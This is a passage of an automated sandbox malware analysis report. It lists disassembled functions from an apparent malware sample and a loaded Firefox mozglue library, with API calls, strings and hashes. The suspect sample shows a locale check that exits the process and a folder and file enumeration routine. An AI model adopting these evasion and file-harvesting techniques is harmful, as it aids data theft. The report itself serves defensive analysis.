getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CB19470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CB19482
__Init_thread_footer.LIBCMT ref: 6CB1949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CB1946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CB1947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CB19459

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 7f90b89df87ffeca80f6c776fce4ed2151e7d8023295fc8520afa7df27bb32cd
Instruction ID: 7b35ed04317d0972d62b8fdc7354661ffb71f85c895f475477881029d82a3ffb
Opcode Fuzzy Hash: 7f90b89df87ffeca80f6c776fce4ed2151e7d8023295fc8520afa7df27bb32cd
Instruction Fuzzy Hash: D101D474F041818BD7109F6ED811A5A73BAEB0A33DF480936ED0B87F41E621E864899B

Function 00AC6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00AC6774
ExitProcess.KERNEL32 ref: 00AC67A5
ExitProcess.KERNEL32 ref: 00AC67AF
ExitProcess.KERNEL32 ref: 00AC67B9
ExitProcess.KERNEL32 ref: 00AC67C3
ExitProcess.KERNEL32 ref: 00AC67CD

Strings

*, xrefs: 00AC678C

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b256ea8e313852f0b944dabcfbba2b2b3435913d5f225453ed0bc891d0dfe524
Instruction ID: 7104610b173ffbb8b7724dd23118aaff8fdc2d494c91eff5e993dfb348b43e20
Opcode Fuzzy Hash: b256ea8e313852f0b944dabcfbba2b2b3435913d5f225453ed0bc891d0dfe524
Instruction Fuzzy Hash: 82F03A70904209EFD344EFE0A909F3CBB70FB09702F04019AE60986290D6705A41DBD7

Function 6CB184E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB184F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB1850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB1851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB1855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB1856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB185AC

Part of subcall function 6CB17670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CB185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB1767F
Part of subcall function 6CB17670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CB185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB17693
Part of subcall function 6CB17670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CB185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB176A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CB185B2

Part of subcall function 6CAF5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAF5EDB
Part of subcall function 6CAF5E90: memset.VCRUNTIME140(6CB37765,000000E5,55CCCCCC), ref: 6CAF5F27
Part of subcall function 6CAF5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAF5FB2

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 566011c55ab49042c5fa3aeecd0dc96ac5fe0dc2e89a07569d4958a94e214c8c
Instruction ID: e38e1ff56de912802da62a59eb3f70e09cec51ed865845ca914a7992129d7425
Opcode Fuzzy Hash: 566011c55ab49042c5fa3aeecd0dc96ac5fe0dc2e89a07569d4958a94e214c8c
Instruction Fuzzy Hash: F9218D742046418FDB14DF29C888A6AB7B9FF4430CF25482DE55F83B41DB32E948CB52

Function 6CB1F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB0CBE8: GetCurrentProcess.KERNEL32(?,6CAD31A7), ref: 6CB0CBF1
Part of subcall function 6CB0CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAD31A7), ref: 6CB0CBFA

Part of subcall function 6CB19420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAE4A68), ref: 6CB1945E
Part of subcall function 6CB19420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CB19470
Part of subcall function 6CB19420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CB19482
Part of subcall function 6CB19420: __Init_thread_footer.LIBCMT ref: 6CB1949F

GetCurrentThreadId.KERNEL32 ref: 6CB1F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CB1F598), ref: 6CB1F621

Part of subcall function 6CB194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CB194EE
Part of subcall function 6CB194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CB19508

GetCurrentThreadId.KERNEL32 ref: 6CB1F637
AcquireSRWLockExclusive.KERNEL32(6CB5F4B8,?,?,00000000,?,6CB1F598), ref: 6CB1F645
ReleaseSRWLockExclusive.KERNEL32(6CB5F4B8,?,?,00000000,?,6CB1F598), ref: 6CB1F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CB1F62A

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 746b8c99cd85f2416925abbf21e3bdd4f04cd0aa3ca98bd645b1139e5e972e2a
Instruction ID: a70fdbb0ed5b8aecad28a23f96d3aa6898d26f7e7cb6a767a035101634721ba9
Opcode Fuzzy Hash: 746b8c99cd85f2416925abbf21e3bdd4f04cd0aa3ca98bd645b1139e5e972e2a
Instruction Fuzzy Hash: 2111C675305284ABDB04AF59D8489E9B779FF8636CB940415EA05C3F41CB72AC21CBA1

Function 6CB105F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CB0CFAE,?,?,?,6CAD31A7), ref: 6CB105FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CB0CFAE,?,?,?,6CAD31A7), ref: 6CB10616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CAD31A7), ref: 6CB1061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CAD31A7), ref: 6CB10627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CB1061B, 6CB10625
<jemalloc>, xrefs: 6CB105FA, 6CB1060F

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: aec3797a53cb152ab92f35248fdacf5cde6c038a58ba0ba835b6625231e14e2d
Instruction ID: 4ca2ff03751c897311188b7f8921b97ac33b4f9aac7fc63901ad7eae4e1c3a23
Opcode Fuzzy Hash: aec3797a53cb152ab92f35248fdacf5cde6c038a58ba0ba835b6625231e14e2d
Instruction Fuzzy Hash: 9BE08CE2A0515037F5142256AC86DBB761DDBC6538F080039FD0D83301E95AAD1E61F6

Function 6CAE05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74eae203fccf25cce24fa0ec93f0b99c23304365e1ae95f0a3ac04cf9cac28e1
Instruction ID: a37897ad48856f16fd494389f66f5e0b1d6d08cbd3e441d1b0989cfd1cc3abe4
Opcode Fuzzy Hash: 74eae203fccf25cce24fa0ec93f0b99c23304365e1ae95f0a3ac04cf9cac28e1
Instruction Fuzzy Hash: D8A138B0A00645CFDB14CF29C594B9AFBF1BF49304F54866ED48A97B00EB70A995DF90

Function 6CB314A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CB314C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB314E2
GetCurrentThreadId.KERNEL32 ref: 6CB31546
InitializeConditionVariable.KERNEL32(?), ref: 6CB315BA
free.MOZGLUE(?), ref: 6CB316B4

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: daede5e9ba1526055539c3cd6f11ea29fcda25f6e8d281274f3a506a50af4759
Instruction ID: a6830df479d55ba2cb457206573ea7d993928a5827ebb7d081de66dc0df97b19
Opcode Fuzzy Hash: daede5e9ba1526055539c3cd6f11ea29fcda25f6e8d281274f3a506a50af4759
Instruction Fuzzy Hash: 1C610371A007949BDB118F21C880BEEB7B8FF89308F49951CED8A57701DB34E949CB92

Function 6CB2DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CB2DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CB2D38A,?), ref: 6CB2DC6F
free.MOZGLUE(?,?,?,?,?,6CB2D38A,?), ref: 6CB2DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CB2D38A,?), ref: 6CB2DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CB2D38A,?), ref: 6CB2DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CB2D38A,?), ref: 6CB2DD4A

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 7b03e80abb32786effb1fb7bf33074ad55347ca31ad0912f0f10c0a263a4a2ba
Instruction ID: 1a2a695937b84f6cad00caa3d2188a382b331d051ab84d19fb4f73b399f0bf45
Opcode Fuzzy Hash: 7b03e80abb32786effb1fb7bf33074ad55347ca31ad0912f0f10c0a263a4a2ba
Instruction Fuzzy Hash: DE418D75A00615CFCB04CFA9D8809AEBBF5FF88314B554569D94AA7B10D735FC41CB90

Function 6CB16590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0FA80: GetCurrentThreadId.KERNEL32 ref: 6CB0FA8D
Part of subcall function 6CB0FA80: AcquireSRWLockExclusive.KERNEL32(6CB5F448), ref: 6CB0FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB16727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CB167C8

Part of subcall function 6CB24290: memcpy.VCRUNTIME140(?,?,6CB32003,6CB30AD9,?,6CB30AD9,00000000,?,6CB30AD9,?,00000004,?,6CB31A62,?,6CB32003,?), ref: 6CB242C4

Strings

data, xrefs: 6CB16593

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 3cdc8bb839bc77594f70b8464506a0e22e13db428d5130475f72b2e1f263db06
Instruction ID: 0ffdcd56c23d30d122d0fe82fe84b9b72cb531103b7686232bad4b5e07821714
Opcode Fuzzy Hash: 3cdc8bb839bc77594f70b8464506a0e22e13db428d5130475f72b2e1f263db06
Instruction Fuzzy Hash: E1D1AF75A083808BD724DF25D851BAEBBE5EFD5308F10892DE58987B91DB30A849CB53

Function 6CB0D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CADEB57,?,?,?,?,?,?,?,?,?), ref: 6CB0D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CADEB57,?), ref: 6CB0D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CADEB57,?), ref: 6CB0D673
free.MOZGLUE(?), ref: 6CB0D888

Strings

|Enabled, xrefs: 6CB0D81E

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: b4630a2d7f972ddf8e07b6c138b9fcaac1f40cb734f85dea3eba2085e6852527
Instruction ID: 3b8fe5846bbc6d3b27e2489d7f63d8c802b6cd2cd5e9f005d4ce1cd508d1d3a3
Opcode Fuzzy Hash: b4630a2d7f972ddf8e07b6c138b9fcaac1f40cb734f85dea3eba2085e6852527
Instruction Fuzzy Hash: 5FA1D0B0A003858FDB11CF68D4907AEBFF1EF49318F58805CD899AB781D735A849CBA1

Function 6CB0F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CB0F480

Part of subcall function 6CADF100: LoadLibraryW.KERNEL32(shell32,?,6CB4D020), ref: 6CADF122
Part of subcall function 6CADF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CADF132

CloseHandle.KERNEL32(00000000), ref: 6CB0F555

Part of subcall function 6CAE14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CAE1248,6CAE1248,?), ref: 6CAE14C9
Part of subcall function 6CAE14B0: memcpy.VCRUNTIME140(?,6CAE1248,00000000,?,6CAE1248,?), ref: 6CAE14EF

Part of subcall function 6CADEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CADEEE3

CreateFileW.KERNEL32 ref: 6CB0F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6CB0F523

Strings

\oleacc.dll, xrefs: 6CB0F4CB

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 03561626bea0e251f0d3c3f162850e1fc73dceb2635f82654c5f836e4fe56ca0
Instruction ID: 6b9993fa5365864a049c41bd96603409858e4771028af93ad0228f1cd31d0b75
Opcode Fuzzy Hash: 03561626bea0e251f0d3c3f162850e1fc73dceb2635f82654c5f836e4fe56ca0
Instruction Fuzzy Hash: 9541B2307087909FE721DF28D985A9BBBF4EF44318F504A1CF59183650EB30E989CB96

Function 00AC4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,005EF630), ref: 00AC47DB

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

lstrcat.KERNEL32(?,00000000), ref: 00AC4801
lstrcat.KERNEL32(?,?), ref: 00AC4820
lstrcat.KERNEL32(?,?), ref: 00AC4834
lstrcat.KERNEL32(?,005DA500), ref: 00AC4847
lstrcat.KERNEL32(?,?), ref: 00AC485B
lstrcat.KERNEL32(?,005EE2C8), ref: 00AC486F

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00AC8D90: GetFileAttributesA.KERNEL32(00000000,?,00AB1B54,?,?,00AD564C,?,?,00AD0E1F), ref: 00AC8D9F

Part of subcall function 00AC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AC4580
Part of subcall function 00AC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00AC4587
Part of subcall function 00AC4570: wsprintfA.USER32 ref: 00AC45A6
Part of subcall function 00AC4570: FindFirstFileA.KERNEL32(?,?), ref: 00AC45BD

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: de0ec47dd65d566daedf328eb1e5cb814d6756157486d75d05e588a3ef035111
Instruction ID: 0dd57cf0c18e35ea8b350fefc3e24520d13bdd0c0a4b22ff622e331455e61782
Opcode Fuzzy Hash: de0ec47dd65d566daedf328eb1e5cb814d6756157486d75d05e588a3ef035111
Instruction Fuzzy Hash: 4E313DB2900218A7CB14FBA0DD85FFD737CBB58700F404589B35996091EEB5AA89CB96

